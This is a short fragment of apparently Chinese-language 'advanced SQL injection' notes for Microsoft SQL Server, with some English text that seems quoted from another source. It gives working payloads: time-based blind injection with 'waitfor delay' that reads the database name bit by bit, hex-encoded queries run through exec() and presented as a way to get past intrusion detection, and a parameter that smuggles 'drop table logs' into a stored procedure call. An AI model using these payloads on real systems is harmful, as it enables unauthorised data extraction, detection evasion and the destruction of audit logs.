if (select is_file from pubs..tmp_file) > 0 waitfor delay '0:0:5'
字符对比
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor
delay '0:0:5'
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1)) & ( power(2, 1))) > 0 waitfor delay '0:0:5'
编码的秘密,饶过IDS
declare @q varchar(8000)
select @q = 0x73656c65637420404076657273696f6e
exec(@q)
This runs 'select @@version', as does:
declare @q nvarchar(4000)
select @q =
0x730065006c00650063007400200040004000760065007200730069006f006e00
exec(@q)
In the stored procedure example above we saw how a 'sysname' parameter can contain
multiple SQL statements without the use of single quotes or semicolons:
sp_msdropretry [foo drop table logs select * from sysobjects], [bar]
嘻嘻,不知道这次被转走以后会不会看到偶的名字呢?~要有的话,就把高级注入笔记I也发出来
